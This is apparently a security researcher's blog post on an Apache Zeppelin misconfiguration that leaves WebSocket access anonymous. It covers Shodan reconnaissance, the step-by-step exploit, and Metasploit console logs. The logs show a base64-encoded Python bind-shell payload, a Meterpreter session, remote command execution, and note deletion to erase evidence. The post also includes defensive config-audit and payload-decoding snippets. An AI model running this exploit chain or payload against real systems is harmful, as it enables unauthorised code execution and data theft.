Apache Zeppelin Vulnerability + Metasploit

Apache Zeppelin is a “Web-based notebook that enables data-driven, interactive data analytics and collaborative documents…”, which makes it very similar to Jupyter Notebook. Notebook servers offer polyglot Remote Code Execution (RCE) by design, so gaining access to one makes pwning the entire Hadoop cluster and all its data fairly simple.

How would you like your RCE?

Zeppelin is an interesting target because AWS Elastic MapReduce (EMR) Hadoop clusters and the like tend to have it installed, so it’s becoming quite prevalent among data-science teams who may not be security-trained.

From a honeypot EMR cluster with all ports exposed to the internet, I found it takes about 6 minutes before the YARN ResourceManager on port 8088 is found by scanners. YARN allows commands to be submitted via a REST API, which will then be scheduled to run on the cluster. Run-of-the-mill Mirai-variant malware was downloaded and the cluster nodes were recruited to take part in DDoS attacks. The attacks weren’t super successful, as the malware processes kept hitting the memory limits and getting killed, but they still tried to send a lot of UDP traffic.

Moral of the story: Don’t expose your EMR clusters to the internet as pretty much every port except SSH either leaks data or allows unauthenticated RCE.

But anyway, onto Zeppelin.

By default it’s completely unauthenticated, but I assume people who want to expose it publicly will turn on the inbuilt authentication. Which is fine if they follow the instructions. However, there are two steps:

  1. Enable Apache Shiro authentication. Basically, modify the provided template conf/shiro.ini config file and enter some plaintext usernames and passwords. You can alternatively configure LDAP / AD.

  2. Secure the Websocket channel. Set zeppelin.anonymous.allowed to false in conf/zeppelin-site.xml. You will then need to be logged in and retrieve a ticket from /api/security/ticket before using the WebSocket.
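Because step 2 is the one that tends to be forgotten, it can be worth auditing the config file directly. The following is a minimal sketch, assuming conf/zeppelin-site.xml uses the usual Hadoop-style `<property><name>…</name><value>…</value></property>` layout and that a missing property means anonymous access is allowed. The function name `anonymous_allowed` is made up for illustration, and treating any value other than "false" as allowed is a deliberately cautious choice, not necessarily how Zeppelin itself parses the setting.

```python
import xml.etree.ElementTree as ET

PROPERTY = "zeppelin.anonymous.allowed"


def anonymous_allowed(site_xml, default=True):
    """Return True unless the config explicitly sets the property to "false".

    `default` is what we assume when the property is absent (an assumption:
    anonymous access stays allowed unless it is switched off).
    """
    root = ET.fromstring(site_xml)
    for prop in root.iter("property"):
        name = (prop.findtext("name") or "").strip()
        if name == PROPERTY:
            value = (prop.findtext("value") or "").strip().lower()
            # Cautious audit: anything other than an explicit "false" is flagged.
            return value != "false"
    return default


if __name__ == "__main__":
    # Path taken from the text above; adjust to your install location.
    with open("conf/zeppelin-site.xml", encoding="utf-8") as handle:
        if anonymous_allowed(handle.read()):
            print("WARNING: zeppelin.anonymous.allowed is not set to false")
        else:
            print("OK: anonymous WebSocket access is disabled")
```

Running this against a server where only step 1 was done should print the warning, even though the web interface shows a login button.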

It seems that a widespread misconfiguration is to perform only step 1. After step 1, it looks from the web interface as if Zeppelin is sufficiently secure. You will see a Login button in the top-right corner, and you won’t be able to see any of the notebooks through the web interface until you log in.

Everything looks secure

However, the XML config for the WebSocket still has anonymous access allowed, which gives an unauthenticated client complete control.

You can check for this by sending the following payload to the WebSocket at /ws:


If you get a response, the service is vulnerable.

Is this a common misconfiguration?

The Shodan search zeppelin “WITHOUT WARRANTIES OR CONDITIONS” should find Apache Zeppelin instances. I only found one which wasn’t vulnerable. Scanning the AWS IP range on a plausible port (8890) will find more temporary instances backed by EMR clusters.

How the exploit works

  1. Send op NEW_NOTE
  2. Wait for NEW_NOTE response with note ID
  3. Send a request to add a paragraph to the new note
  4. Wait for PARAGRAPH_ADDED with paragraph ID
  5. Send RUN_PARAGRAPH with the payload and language
  6. Receive polling updates with status: PENDING, RUNNING, FINISHED, ERROR.
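The last step, following the status updates until the paragraph finishes, can be sketched without touching the network. This is only an illustration: it assumes each update is a JSON message shaped like the PARAGRAPH message in the exploit log further down (an "op" field, with the ID and status under data.paragraph), and the helper names `paragraph_status` and `statuses_until_done` are made up here.

```python
import json

# Statuses after which no further updates are expected for the paragraph.
TERMINAL = {"FINISHED", "ERROR"}


def paragraph_status(raw_message):
    """Return (paragraph_id, status) for a PARAGRAPH message, else None."""
    message = json.loads(raw_message)
    if message.get("op") != "PARAGRAPH":
        return None
    paragraph = message.get("data", {}).get("paragraph", {})
    return paragraph.get("id"), paragraph.get("status")


def statuses_until_done(raw_messages, paragraph_id):
    """Collect the statuses seen for one paragraph, stopping at a terminal one."""
    seen = []
    for raw in raw_messages:
        parsed = paragraph_status(raw)
        if parsed is None or parsed[0] != paragraph_id:
            continue  # unrelated op, or an update for a different paragraph
        seen.append(parsed[1])
        if parsed[1] in TERMINAL:
            break
    return seen
```

The same function works on a captured WebSocket log, which makes it handy for reconstructing after the fact what a paragraph did and whether it completed.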

There are a load of different interpreters. The data-science interpreters might not have been configured though, so the simplest option is to use python or sh to get a shell.

There do exist systems where only the spark interpreter is available. In that case, script kiddies will have to learn Scala!

Poor script kiddie can’t figure out how to mine monero

Run shell commands from scala

import scala.sys.process._
// .!! runs the command and returns its stdout as a String
print("ps waxf".!!)

Scala is such a messed up language.


I thought this would be a good time to finally learn how to write a Metasploit module.

We have a check command which tells you if a service is vulnerable:

msf5 exploit(ws) > set rhosts
rhosts =>
msf5 exploit(ws) > set rport 1234
rport => 1234
msf5 exploit(ws) > check

[+] - WebSocket connected
[*] - Interpreters: spark,md,angular,sh,livy,alluxio,file,psql,flink,python,ignite,lens,cassandra,geode,kylin,elasticsearch,scalding,jdbc,hbase,bigquery,beam,pig,scio,groovy,neo4j
[+] - The target is vulnerable.

And then an exploit command which takes a payload (here a staged Meterpreter bind shell), executes it and gets a shell.

msf5 exploit(ws) > set payload python/meterpreter/bind_tcp
payload => python/meterpreter/bind_tcp
msf5 exploit(ws) > exploit

[+] - WebSocket connected
[+] - Created note 2EB1RJQH9 wyhuqCxyHpGT
[+] - Created paragraph 20190511-183457_1324276293
[*] - {"op":"PARAGRAPH","data":{"paragraph":{"text":"import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKYj1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpiLmJpbmQoKCcwLjAuMC4wJyw0NDQ0KSkKYi5saXN0ZW4oMSkKcyxhPWIuYWNjZXB0KCkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))","user":"anonymous","dateUpdated":"2019-05-11T18:35:00+0000","config":{"colWidth":12.0,"editorMode":"ace/mode/python","fontSize":9.0,"enabled":true,"results":{},"editorSetting":{"language":"python","editOnDblClick":false,"completionSupport":true}},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1557599697676_1276214488","id":"20190511-183457_1324276293","dateCreated":"2019-05-11T18:34:57+0000","dateStarted":"2019-05-11T18:35:00+0000","status":"RUNNING","errorMessage":"","progressUpdateIntervalMs":500}},"ticket":"anonymous","principal":"anonymous","roles":""}
[*] Started bind TCP handler against
[*] Sending stage (53770 bytes) to
[*] Meterpreter session 4 opened ( -> at 2019-05-11 14:22:06 -0400
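From the defender's side, a paragraph like the one in the log above is easy to spot and unpack: the "text" field wraps the real payload in a base64 blob. Here is a rough sketch for pulling such blobs out of paragraph text during a review. The 24-character minimum and the function name `decode_embedded_blobs` are arbitrary choices for illustration, and a determined attacker could obviously encode things differently.

```python
import base64
import re

# Quoted runs of base64 characters; the length threshold is an arbitrary
# cut-off to skip short ordinary strings such as 'UTF-8'.
BLOB = re.compile(r"""['"]([A-Za-z0-9+/]{24,}={0,2})['"]""")


def decode_embedded_blobs(paragraph_text):
    """Return the decoded form of every base64-looking string literal."""
    decoded = []
    for blob in BLOB.findall(paragraph_text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # looked like base64 but was not validly padded
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


# Harmless stand-in for a suspicious paragraph, built here rather than copied.
sample = "exec(base64.b64decode('%s'))" % base64.b64encode(
    b"print('hello from a notebook')"
).decode()
print(decode_embedded_blobs(sample))
```

Feeding it the "text" value from a logged paragraph shows what was actually executed, without running any of it.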

Another mode sends a specific command and, with the COMPLETE option set, waits for it to finish and prints its output. It then sneakily deletes the evidence by deleting the note.

msf5 exploit(ws) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python payload
   1   Command payload

msf5 exploit(ws) > set target 1
target => 1
msf5 exploit(ws) > set payload generic/custom
payload => generic/custom
msf5 exploit(ws) > set COMPLETE true
COMPLETE => true
msf5 exploit(ws) > set payloadstr "ps aux"
payloadstr => ps aux
msf5 exploit(ws) > exploit

[+] - WebSocket connected
[+] - Created note 2EATUUSED QFgMcsIJSQzHvGbENw
[+] - Created paragraph 20190511-231105_1295465714
root         1  0.0  0.0   4364    12 ?        Ss   18:26   0:00 /usr/bin/tini -- bin/zeppelin.sh
root         6  0.3  5.2 4671604 420016 ?      Sl   18:26   1:00 /usr/lib/jvm/java-8-openjdk-amd64/bin/java -Dfile.encoding=UTF-8 -Xms1024m -Xmx1024m -XX:MaxPermSize=512m -Dlog4j.configuration=file:///zeppelin/conf/log4j.properties -Dzeppelin.log.file=/zeppelin/logs/zeppelin--04c5df9b52d5.log -cp ::/zeppelin/lib/interpreter/*:/zeppelin/lib/*:/zeppelin/*::/zeppelin/conf org.apache.zeppelin.server.ZeppelinServer
root        84  0.0  0.0  19764   168 ?        S    18:29   0:00 /bin/bash /zeppelin/bin/interpreter.sh -d /zeppelin/interpreter/python -c -p 35004 -r : -l /zeppelin/local-repo/python -g python
root       295  0.0  0.4 594692 38996 ?        Ssl  18:35   0:03 /opt/conda/bin/python -m ipykernel_launcher -f /tmp/tmpMJSdvG.json
root       310  0.0  0.0  19904   784 pts/1    Ss+  18:40   0:00 bash
root       367  0.0  0.0  36084  3112 ?        R    23:11   0:00 ps aux

[*] - Deleting note 2EATUUSED QFgMcsIJSQzHvGbENw
[*] Exploit completed, but no session was created.

It’s quite fun. I did find the process of writing a module annoying as I didn’t find the documentation or examples sufficient.

In the case of a shell session, I might only want to delete the note after I’ve finished with the session. Really I just want a separate command which takes a notebook ID and deletes it in case of error. However, I wasn’t sure how to do that. Maybe it would require writing an auxiliary module? Or maybe this just shows the limitation of Metasploit exploits if the task isn’t just a plug-and-play shell.

Since I don’t think you can add a Ruby gem to a module without forking Metasploit, I cobbled together a Ruby WebSocket client based on code from the Pusher blog. Fun. To be honest, I might have been better off writing my own code outside Metasploit, but it’s good for me to understand how the module system works. Since WebSockets work cross-origin, it could even be a webpage where you input the host and port.

Anyway, the module code is available as a Gist: apache_zeppelin_websocket.rb. To install, put it in .msf4/modules/exploits/. Don’t use it for evil.

Update: Play around

I set some challenges including a vulnerable Zeppelin for a CTF. You can run a local copy to play around: bcaller/sectalks-lon0x24-ctf